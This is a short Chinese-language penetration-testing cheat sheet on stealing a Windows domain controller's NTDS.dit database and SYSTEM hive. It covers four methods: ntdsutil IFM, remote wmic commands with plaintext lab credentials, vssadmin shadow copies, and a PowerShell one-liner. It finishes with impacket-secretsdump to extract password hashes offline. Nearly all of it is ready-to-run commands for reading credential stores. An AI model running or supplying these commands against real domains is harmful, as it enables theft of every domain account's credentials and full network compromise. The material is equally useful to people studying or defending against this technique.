概念
获取方式一
使用如下命令:
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
结果:会在c盘下生成一个ntdsutil的文件,里面保存了ntds.dit文件
获取方式二(远程导出)
方式
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create “cmd /c vssadmin create shadow /for=C: 2>&1”
远程导出system文件
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create “cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1”
注意:
提取到的文件都是保存在域控系统里面
获取方式三(卷影副本)
方式
卷影副本是一个 Windows 命令行实用程序,它使管理员能够对计算机、卷和文件进行备份,即使它们正在被操作系统使用。卷影复制作为服务运行,需要将文件系统格式化为 NTFS,这是所有现代操作系统的默认格式。从 Windows 命令提示符执行以下操作将创建C:驱动器的快照,以便将用户通常无法访问的文件复制到另一个位置(本地文件夹、网络文件夹或可移动媒体)
1.vssadmin create shadow /for=C:
2.copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
3.copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
注意:最后删除卷影副本(vssadmin delete shadows /for=c:)
获取方式四(powershell方式获取)
缺陷
使用方式
powershell “ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\temp’ q q”
破解ntds
条件
需要同时导出域控里面system文件,因为这是解密ntds.dit文件的
使用工具
使用
1.将system、ntds.dit拷贝下来放在kali上
2.使用如下命令破解:impacket-secretsdump -system /root/桌面/SYSTEM -ntds /root/桌面/ntds.dit LOCAL